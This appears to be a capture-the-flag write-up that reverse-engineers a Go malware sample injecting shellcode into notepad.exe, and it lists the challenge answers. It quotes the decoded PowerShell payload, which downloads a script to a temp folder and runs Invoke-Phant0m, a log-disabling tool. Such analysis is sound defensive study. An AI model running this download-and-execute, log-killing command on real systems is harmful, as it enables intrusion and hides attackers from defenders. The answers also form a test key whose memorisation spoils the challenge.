Reverse Engineering - Another Injection

I ran the sample with the following tools active to get information about the sample for the following questions:

  • FakeNet
  • Process Monitor
  • Process Explorer
  1. What is the language the program is written? (1 points)

    Running strings on the binary shows that it is written in Go.

    Answer: Golang

  2. What is the build id? (1 points)

    Running strings on the binary shows the text Go build ID: "eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq".

    Answer: eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq

  3. What is the dependency package the sample uses for invoking windows APIs (1 points)

    Uploading the sample to VirusTotal shows that it uses the package.


  4. What is the victim process? (Hint: 32bit) (2 points)

    Answer: notepad.exe

  5. What is the process invoked from the shellcode? (1 points)

    Answer: powershell.exe

  6. What is the name of the created file? (2 points)

    Command (in Linux): strings main.exe | grep powershell

    CyberChef recipe: From Base64 ~> Decode text (UTF-16LE)

    Invoke-WebRequest "" -OutFile "C:\Windows\Temp\change.ps1"; Import-Module C:\Windows\Temp\change.ps1;Invoke-Phant0m;

    Answer: C:\Windows\Temp\change.ps1

  7. What is the name of the actual tool executed? (2 points)

    Answer: Invoke-Phant0m


  1. sysinternals (Private)
  2. disassembly (Private)
  3. reverse-engineering (Private)
  4. 10 points (Private)
  5. easy (Private)